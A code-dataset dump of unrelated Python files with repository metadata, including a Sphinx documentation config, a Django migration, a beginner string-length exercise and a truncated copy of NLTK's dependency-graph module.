""" # noqa: E501

# Cross-project reference targets for sphinx.ext.intersphinx.
intersphinx_mapping = {
    'python': ('https://docs.python.org/3', None),
    'numpy': ('https://numpy.org/doc/stable/', None),
    'scipp': ('https://scipp.github.io/', None),
    'scipy': ('https://docs.scipy.org/doc/scipy/', None),
    'xarray': ('https://xarray.pydata.org/en/stable/', None)
}

# autodocs includes everything, even irrelevant API internals. autosummary
# looks more suitable in the long run when the API grows.
# For a nice example see how xarray handles its API documentation.
autosummary_generate = True

# Docstrings follow the NumPy convention, not the Google one.
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
    # objects without namespace: scipp
    "DataArray": "~scipp.DataArray",
    "Dataset": "~scipp.Dataset",
    "Variable": "~scipp.Variable",
    # objects without namespace: numpy
    "ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
html_sourcelink_suffix = '' # Avoid .ipynb.txt extensions in sources

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'scippnexus'
copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''

# Treat build warnings as errors so broken docs fail CI.
warning_is_error = True

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    "logo_only": True,
    "repository_url": "https://github.com/scipp/scippnexus",
    "repository_branch": "main",
    "path_to_docs": "docs",
    "use_repository_button": True,
    "use_issues_button": True,
    "use_edit_page_button": True,
    "show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
     'One line description of project.', 'Miscellaneous'),
]

# -- Options for Matplotlib in notebooks ----------------------------------

nbsphinx_execute_arguments = [
    "--Session.metadata=scipp_docs_build=True",
]

# -- Options for doctest --------------------------------------------------

doctest_global_setup = '''
import numpy as np
import scipp as sc
'''

# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
    doctest.DONT_ACCEPT_TRUE_FOR_1 | \
    doctest.NORMALIZE_WHITESPACE

# -- Options for linkcheck ------------------------------------------------

linkcheck_ignore = [
    # Specific lines in Github blobs cannot be found by linkcheck.
    r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?#',
]
| 31.407583 | 83 | 0.673306 |
import doctest
from datetime import date
import scippnexus
html_show_sourcelink = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx_copybutton',
'nbsphinx',
]
autodoc_type_aliases = {
'VariableLike': 'VariableLike',
'MetaDataMap': 'MetaDataMap',
'array_like': 'array_like',
}
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
"""
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable/', None),
'scipp': ('https://scipp.github.io/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/', None),
'xarray': ('https://xarray.pydata.org/en/stable/', None)
}
autosummary_generate = True
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
"DataArray": "~scipp.DataArray",
"Dataset": "~scipp.Dataset",
"Variable": "~scipp.Variable",
"ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False
templates_path = ['_templates']
source_suffix = '.rst'
html_sourcelink_suffix = ''
master_doc = 'index'
project = u'scippnexus'
copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
warning_is_error = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"logo_only": True,
"repository_url": "https://github.com/scipp/scippnexus",
"repository_branch": "main",
"path_to_docs": "docs",
"use_repository_button": True,
"use_issues_button": True,
"use_edit_page_button": True,
"show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
'One line description of project.', 'Miscellaneous'),
]
# -- Options for Matplotlib in notebooks ----------------------------------
nbsphinx_execute_arguments = [
"--Session.metadata=scipp_docs_build=True",
]
# -- Options for doctest --------------------------------------------------
doctest_global_setup = '''
import numpy as np
import scipp as sc
'''
# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
doctest.DONT_ACCEPT_TRUE_FOR_1 | \
doctest.NORMALIZE_WHITESPACE
# -- Options for linkcheck ------------------------------------------------
linkcheck_ignore = [
# Specific lines in Github blobs cannot be found by linkcheck.
r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?
]
| true | true |
f71008d441773617443f83aa63ba8084f8da41c4 | 603 | py | Python | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | null | null | null | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | 7 | 2019-11-18T16:11:01.000Z | 2019-11-18T16:11:04.000Z | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-04-18 13:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add an optional ``thumbnail`` foreign key to the ``Image`` model.

    Auto-generated by Django 2.2; kept in its canonical generated form.
    """

    # Requires the initial schema of the ``images`` app to exist first.
    dependencies = [
        ("images", "0001_initial"),
    ]

    operations = [
        migrations.AddField(
            model_name="image",
            name="thumbnail",
            # Nullable/blank so existing Image rows stay valid without a
            # thumbnail; deleting the referenced ImageFile cascades and
            # deletes the Image row that points at it.
            field=models.ForeignKey(
                blank=True,
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name="container",
                to="images.ImageFile",
            ),
        ),
    ]
| 23.192308 | 60 | 0.543947 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="image",
name="thumbnail",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="container",
to="images.ImageFile",
),
),
]
| true | true |
f7100a0d535f79b24ae402b1d9ef106e9e8e0f59 | 319 | py | Python | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
| 19.9375 | 50 | 0.680251 | string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
| true | true |
f7100c11398d00d664ae324a7f7382af849d2c99 | 30,853 | py | Python | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | # Natural Language Toolkit: Dependency Grammars
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jason Narad <jason.narad@gmail.com>
# Steven Bird <stevenbird1@gmail.com> (modifications)
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Tools for reading and writing dependency trees.
The input is assumed to be in Malt-TAB format
(http://stp.lingfil.uu.se/~nivre/research/MaltXML.html).
"""
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
#################################################################
# DependencyGraph Class
#################################################################
class DependencyGraph:
    """
    A container for the nodes and labelled edges of a dependency structure.

    Nodes live in ``self.nodes``, a dict keyed by integer address; each node
    is itself a dict with the Malt-TAB/CoNLL fields (``word``, ``lemma``,
    ``ctag``, ``tag``, ``feats``, ``head``, ``deps``, ``rel``), where
    ``deps`` maps a relation label to a list of dependent addresses.
    """

    def __init__(
        self,
        tree_str=None,
        cell_extractor=None,
        zero_based=False,
        cell_separator=None,
        top_relation_label="ROOT",
    ):
        """Dependency graph.

        We place a dummy `TOP` node with the index 0, since the root node is
        often assigned 0 as its head. This also means that the indexing of the
        nodes corresponds directly to the Malt-TAB format, which starts at 1.

        If zero-based is True, then Malt-TAB-like input with node numbers
        starting at 0 and the root node assigned -1 (as produced by, e.g.,
        zpar).

        :param str cell_separator: the cell separator. If not provided, cells
            are split by whitespace.

        :param str top_relation_label: the label by which the top relation is
            identified, for example, `ROOT`, `null` or `TOP`.
        """
        # Unknown addresses auto-materialise as empty placeholder nodes
        # thanks to the defaultdict factory (see get_by_address).
        self.nodes = defaultdict(
            lambda: {
                "address": None,
                "word": None,
                "lemma": None,
                "ctag": None,
                "tag": None,
                "feats": None,
                "head": None,
                "deps": defaultdict(list),
                "rel": None,
            }
        )

        # Artificial TOP node at address 0 (see docstring above).
        self.nodes[0].update({"ctag": "TOP", "tag": "TOP", "address": 0})

        self.root = None

        if tree_str:
            self._parse(
                tree_str,
                cell_extractor=cell_extractor,
                zero_based=zero_based,
                cell_separator=cell_separator,
                top_relation_label=top_relation_label,
            )

    def remove_by_address(self, address):
        """
        Removes the node with the given address. References
        to this node in others will still exist.
        """
        del self.nodes[address]

    def redirect_arcs(self, originals, redirect):
        """
        Redirects arcs to any of the nodes in the originals list
        to the redirect node address.

        NOTE(review): this rewrites each node's ``deps`` as a flat list of
        addresses rather than the {relation: [addresses]} mapping used by
        the rest of the class -- confirm callers expect that shape.
        """
        for node in self.nodes.values():
            new_deps = []
            for dep in node["deps"]:
                if dep in originals:
                    new_deps.append(redirect)
                else:
                    new_deps.append(dep)
            node["deps"] = new_deps

    def add_arc(self, head_address, mod_address):
        """
        Adds an arc from the node specified by head_address to the
        node specified by the mod address.
        """
        # The arc is filed under the dependent's relation label.
        relation = self.nodes[mod_address]["rel"]
        self.nodes[head_address]["deps"].setdefault(relation, [])
        self.nodes[head_address]["deps"][relation].append(mod_address)

        # self.nodes[head_address]['deps'].append(mod_address)

    def connect_graph(self):
        """
        Fully connects all non-root nodes. All nodes are set to be dependents
        of the root node.
        """
        for node1 in self.nodes.values():
            for node2 in self.nodes.values():
                if node1["address"] != node2["address"] and node2["rel"] != "TOP":
                    relation = node2["rel"]
                    node1["deps"].setdefault(relation, [])
                    node1["deps"][relation].append(node2["address"])
                    # node1['deps'].append(node2['address'])

    def get_by_address(self, node_address):
        """Return the node with the given address."""
        # ``self.nodes`` is a defaultdict, so an unknown address silently
        # creates (and returns) an empty placeholder node.
        return self.nodes[node_address]

    def contains_address(self, node_address):
        """
        Returns true if the graph contains a node with the given node
        address, false otherwise.
        """
        return node_address in self.nodes

    def to_dot(self):
        """Return a dot representation suitable for using with Graphviz.

        >>> dg = DependencyGraph(
        ...     'John N 2\\n'
        ...     'loves V 0\\n'
        ...     'Mary N 2'
        ... )
        >>> print(dg.to_dot())
        digraph G{
        edge [dir=forward]
        node [shape=plaintext]
        <BLANKLINE>
        0 [label="0 (None)"]
        0 -> 2 [label="ROOT"]
        1 [label="1 (John)"]
        2 [label="2 (loves)"]
        2 -> 1 [label=""]
        2 -> 3 [label=""]
        3 [label="3 (Mary)"]
        }
        """
        # Start the digraph specification
        s = "digraph G{\n"
        s += "edge [dir=forward]\n"
        s += "node [shape=plaintext]\n"

        # Draw the remaining nodes
        for node in sorted(self.nodes.values(), key=lambda v: v["address"]):
            s += '\n%s [label="%s (%s)"]' % (
                node["address"],
                node["address"],
                node["word"],
            )
            for rel, deps in node["deps"].items():
                for dep in deps:
                    if rel is not None:
                        s += '\n%s -> %s [label="%s"]' % (node["address"], dep, rel)
                    else:
                        s += "\n%s -> %s " % (node["address"], dep)

        s += "\n}"

        return s

    def _repr_svg_(self):
        """Show SVG representation of the transducer (IPython magic).

        Requires the Graphviz ``dot`` binary to be on the PATH.

        >>> dg = DependencyGraph(
        ...     'John N 2\\n'
        ...     'loves V 0\\n'
        ...     'Mary N 2'
        ... )
        >>> dg._repr_svg_().split('\\n')[0]
        '<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
        """
        dot_string = self.to_dot()

        try:
            process = subprocess.Popen(
                ["dot", "-Tsvg"],
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                universal_newlines=True,
            )
        except OSError as e:
            raise Exception("Cannot find the dot binary from Graphviz package") from e
        out, err = process.communicate(dot_string)
        if err:
            raise Exception(
                "Cannot create svg representation by running dot from string: {}"
                "".format(dot_string)
            )
        return out

    def __str__(self):
        """Pretty-printed dump of the node table."""
        return pformat(self.nodes)

    def __repr__(self):
        return "<DependencyGraph with {0} nodes>".format(len(self.nodes))

    @staticmethod
    def load(
        filename, zero_based=False, cell_separator=None, top_relation_label="ROOT"
    ):
        """
        Read one graph per blank-line-separated section of a file.

        :param filename: a name of a file in Malt-TAB format
        :param zero_based: nodes in the input file are numbered starting from 0
            rather than 1 (as produced by, e.g., zpar)
        :param str cell_separator: the cell separator. If not provided, cells
            are split by whitespace.
        :param str top_relation_label: the label by which the top relation is
            identified, for example, `ROOT`, `null` or `TOP`.

        :return: a list of DependencyGraphs
        """
        with open(filename) as infile:
            return [
                DependencyGraph(
                    tree_str,
                    zero_based=zero_based,
                    cell_separator=cell_separator,
                    top_relation_label=top_relation_label,
                )
                for tree_str in infile.read().split("\n\n")
            ]

    def left_children(self, node_index):
        """
        Returns the number of left children under the node specified
        by the given address.
        """
        children = chain.from_iterable(self.nodes[node_index]["deps"].values())
        index = self.nodes[node_index]["address"]
        return sum(1 for c in children if c < index)

    def right_children(self, node_index):
        """
        Returns the number of right children under the node specified
        by the given address.
        """
        children = chain.from_iterable(self.nodes[node_index]["deps"].values())
        index = self.nodes[node_index]["address"]
        return sum(1 for c in children if c > index)

    def add_node(self, node):
        """Insert ``node`` (a dict with an ``address`` key) unless a node
        with that address is already present."""
        if not self.contains_address(node["address"]):
            self.nodes[node["address"]].update(node)

    def _parse(
        self,
        input_,
        cell_extractor=None,
        zero_based=False,
        cell_separator=None,
        top_relation_label="ROOT",
    ):
        """Parse a sentence.

        :param extractor: a function that given a tuple of cells returns a
            7-tuple, where the values are ``word, lemma, ctag, tag, feats,
            head, rel``.  (The built-in extractors below additionally take
            the current line index and return it as a leading 8th value; the
            ``except (TypeError, ValueError)`` fallback keeps older external
            7-tuple extractors working.)

        :param str cell_separator: the cell separator. If not provided, cells
            are split by whitespace.

        :param str top_relation_label: the label by which the top relation is
            identified, for example, `ROOT`, `null` or `TOP`.
        """

        # Built-in extractors for the supported column counts (3-column and
        # 4-column Malt-TAB, 7-column, 10-column CoNLL).
        def extract_3_cells(cells, index):
            word, tag, head = cells
            return index, word, word, tag, tag, "", head, ""

        def extract_4_cells(cells, index):
            word, tag, head, rel = cells
            return index, word, word, tag, tag, "", head, rel

        def extract_7_cells(cells, index):
            line_index, word, lemma, tag, _, head, rel = cells
            try:
                index = int(line_index)
            except ValueError:
                # index can't be parsed as an integer, use default
                pass
            return index, word, lemma, tag, tag, "", head, rel

        def extract_10_cells(cells, index):
            line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
            try:
                index = int(line_index)
            except ValueError:
                # index can't be parsed as an integer, use default
                pass
            return index, word, lemma, ctag, tag, feats, head, rel

        extractors = {
            3: extract_3_cells,
            4: extract_4_cells,
            7: extract_7_cells,
            10: extract_10_cells,
        }

        if isinstance(input_, str):
            input_ = (line for line in input_.split("\n"))

        # Drop trailing whitespace and skip empty lines.
        lines = (l.rstrip() for l in input_)
        lines = (l for l in lines if l)

        cell_number = None
        for index, line in enumerate(lines, start=1):
            cells = line.split(cell_separator)
            if cell_number is None:
                cell_number = len(cells)
            else:
                # Every line of a sentence must have the same column count.
                assert cell_number == len(cells)

            if cell_extractor is None:
                try:
                    cell_extractor = extractors[cell_number]
                except KeyError as e:
                    raise ValueError(
                        "Number of tab-delimited fields ({0}) not supported by "
                        "CoNLL(10) or Malt-Tab(4) format".format(cell_number)
                    ) from e

            try:
                index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
                    cells, index
                )
            except (TypeError, ValueError):
                # cell_extractor doesn't take 2 arguments or doesn't return 8
                # values; assume the cell_extractor is an older external
                # extractor and doesn't accept or return an index.
                word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)

            if head == "_":
                # Token without a head (e.g. multi-word token rows).
                continue

            head = int(head)
            if zero_based:
                head += 1

            self.nodes[index].update(
                {
                    "address": index,
                    "word": word,
                    "lemma": lemma,
                    "ctag": ctag,
                    "tag": tag,
                    "feats": feats,
                    "head": head,
                    "rel": rel,
                }
            )

            # Make sure that the fake root node has labeled dependencies.
            if (cell_number == 3) and (head == 0):
                rel = top_relation_label
            self.nodes[head]["deps"][rel].append(index)

        if self.nodes[0]["deps"][top_relation_label]:
            root_address = self.nodes[0]["deps"][top_relation_label][0]
            self.root = self.nodes[root_address]
            self.top_relation_label = top_relation_label
        else:
            warnings.warn(
                "The graph doesn't contain a node " "that depends on the root element."
            )

    def _word(self, node, filter=True):
        # NOTE(review): both branches return ``w`` unchanged, so the
        # ``filter`` flag is currently a no-op (commas are NOT filtered).
        w = node["word"]
        if filter:
            if w != ",":
                return w
        return w

    def _tree(self, i):
        """Turn dependency graphs into NLTK trees.

        :param int i: index of a node
        :return: either a word (if the indexed node is a leaf) or a ``Tree``.
        """
        node = self.get_by_address(i)
        word = node["word"]
        deps = sorted(chain.from_iterable(node["deps"].values()))

        if deps:
            return Tree(word, [self._tree(dep) for dep in deps])
        else:
            return word

    def tree(self):
        """
        Starting with the ``root`` node, build a dependency tree using the NLTK
        ``Tree`` constructor. Dependency labels are omitted.
        """
        node = self.root

        word = node["word"]
        deps = sorted(chain.from_iterable(node["deps"].values()))
        return Tree(word, [self._tree(dep) for dep in deps])

    def triples(self, node=None):
        """
        Extract dependency triples of the form:
        ((head word, head tag), rel, (dep word, dep tag))

        Generator: yields triples depth-first starting at ``node``
        (the root when ``node`` is None).
        """
        if not node:
            node = self.root

        head = (node["word"], node["ctag"])
        for i in sorted(chain.from_iterable(node["deps"].values())):
            dep = self.get_by_address(i)
            yield (head, dep["rel"], (dep["word"], dep["ctag"]))
            for triple in self.triples(node=dep):
                yield triple

    def _hd(self, i):
        """Head address of node ``i``, or None."""
        # NOTE(review): ``self.nodes`` is a defaultdict, so this lookup never
        # raises IndexError; missing addresses yield a placeholder whose
        # "head" is None.  The handler appears to be dead code -- confirm.
        try:
            return self.nodes[i]["head"]
        except IndexError:
            return None

    def _rel(self, i):
        """Relation label of node ``i``, or None."""
        # NOTE(review): same dead IndexError handler as in _hd above.
        try:
            return self.nodes[i]["rel"]
        except IndexError:
            return None

    # NOTE(review): mixed return type -- ``False`` when acyclic, a list of
    # addresses on a cycle otherwise; the doctest below relies on this.
    def contains_cycle(self):
        """Check whether there are cycles.

        >>> dg = DependencyGraph(treebank_data)
        >>> dg.contains_cycle()
        False

        >>> cyclic_dg = DependencyGraph()
        >>> top = {'word': None, 'deps': [1], 'rel': 'TOP', 'address': 0}
        >>> child1 = {'word': None, 'deps': [2], 'rel': 'NTOP', 'address': 1}
        >>> child2 = {'word': None, 'deps': [4], 'rel': 'NTOP', 'address': 2}
        >>> child3 = {'word': None, 'deps': [1], 'rel': 'NTOP', 'address': 3}
        >>> child4 = {'word': None, 'deps': [3], 'rel': 'NTOP', 'address': 4}
        >>> cyclic_dg.nodes = {
        ...     0: top,
        ...     1: child1,
        ...     2: child2,
        ...     3: child3,
        ...     4: child4,
        ... }
        >>> cyclic_dg.root = top

        >>> cyclic_dg.contains_cycle()
        [3, 1, 2, 4]

        """
        # Floyd-Warshall-style transitive closure over arc "distances": a
        # pair (a, a) appearing in the closure means a cycle through ``a``.
        distances = {}

        for node in self.nodes.values():
            for dep in node["deps"]:
                key = tuple([node["address"], dep])
                distances[key] = 1

        for _ in self.nodes:
            new_entries = {}

            for pair1 in distances:
                for pair2 in distances:
                    if pair1[1] == pair2[0]:
                        key = tuple([pair1[0], pair2[1]])
                        new_entries[key] = distances[pair1] + distances[pair2]

            for pair in new_entries:
                distances[pair] = new_entries[pair]
                if pair[0] == pair[1]:
                    path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
                    return path

        return False  # return []?

    def get_cycle_path(self, curr_node, goal_node_index):
        """Return the list of addresses from ``curr_node`` back to
        ``goal_node_index``, or [] if no such path exists."""
        for dep in curr_node["deps"]:
            if dep == goal_node_index:
                return [curr_node["address"]]
        for dep in curr_node["deps"]:
            path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
            if len(path) > 0:
                path.insert(0, curr_node["address"])
                return path
        return []

    def to_conll(self, style):
        """
        The dependency graph in CoNLL format.

        :param style: the style to use for the format (3, 4, 10 columns)
        :type style: int
        :rtype: str
        """

        if style == 3:
            template = "{word}\t{tag}\t{head}\n"
        elif style == 4:
            template = "{word}\t{tag}\t{head}\t{rel}\n"
        elif style == 10:
            template = (
                "{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
            )
        else:
            raise ValueError(
                "Number of tab-delimited fields ({0}) not supported by "
                "CoNLL(10) or Malt-Tab(4) format".format(style)
            )

        # The artificial TOP node is excluded from the output.
        return "".join(
            template.format(i=i, **node)
            for i, node in sorted(self.nodes.items())
            if node["tag"] != "TOP"
        )

    def nx_graph(self):
        """Convert the data in a ``nodelist`` into a networkx labeled directed graph."""
        import networkx

        nx_nodelist = list(range(1, len(self.nodes)))
        nx_edgelist = [
            (n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
        ]
        self.nx_labels = {}
        for n in nx_nodelist:
            self.nx_labels[n] = self.nodes[n]["word"]

        g = networkx.MultiDiGraph()
        g.add_nodes_from(nx_nodelist)
        g.add_edges_from(nx_edgelist)

        return g
class DependencyGraphError(Exception):
    """Dependency graph exception.

    Part of the module's public API; no code in this module raises it.
    """
def demo():
    """Run every dependency-graph demonstration, in order."""
    demonstrations = (
        malt_demo,
        conll_demo,
        conll_file_demo,
        cycle_finding_demo,
    )
    for demonstration in demonstrations:
        demonstration()
def malt_demo(nx=False):
    """
    A demonstration of the result of reading a dependency
    version of the first sentence of the Penn Treebank.

    :param nx: if true, additionally draw the graph with networkx /
        matplotlib and save it to ``tree.png``.
    """
    dg = DependencyGraph(
        """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
    )
    tree = dg.tree()
    tree.pprint()
    if nx:
        # currently doesn't work
        import networkx
        from matplotlib import pylab

        g = dg.nx_graph()
        g.info()
        pos = networkx.spring_layout(g, dim=1)
        networkx.draw_networkx_nodes(g, pos, node_size=50)
        # networkx.draw_networkx_edges(g, pos, edge_color='k', width=8)
        networkx.draw_networkx_labels(g, pos, dg.nx_labels)
        pylab.xticks([])
        pylab.yticks([])
        pylab.savefig("tree.png")
        pylab.show()
def conll_demo():
    """
    A demonstration of how to read a string representation of
    a CoNLL format dependency tree.

    Prints the phrase-structure tree, the node table and the four-column
    CoNLL serialisation of ``conll_data1``.
    """
    graph = DependencyGraph(conll_data1)
    graph.tree().pprint()
    print(graph)
    print(graph.to_conll(4))
def conll_file_demo():
    """Parse each sentence in ``conll_data2`` and pretty-print its tree."""
    print("Mass conll_read demo...")
    for entry in conll_data2.split("\n\n"):
        if not entry:
            continue
        tree = DependencyGraph(entry).tree()
        print("\n")
        tree.pprint()
def cycle_finding_demo():
    """Show cycle detection on an acyclic and on a cyclic graph."""
    # Acyclic case: the Penn Treebank sentence contains no cycle.
    acyclic = DependencyGraph(treebank_data)
    print(acyclic.contains_cycle())

    # Cyclic case: 1 -> 2 -> 4 -> 3 -> 1 forms a cycle.
    node_specs = (
        (0, [1], "TOP"),
        (1, [2], "NTOP"),
        (2, [4], "NTOP"),
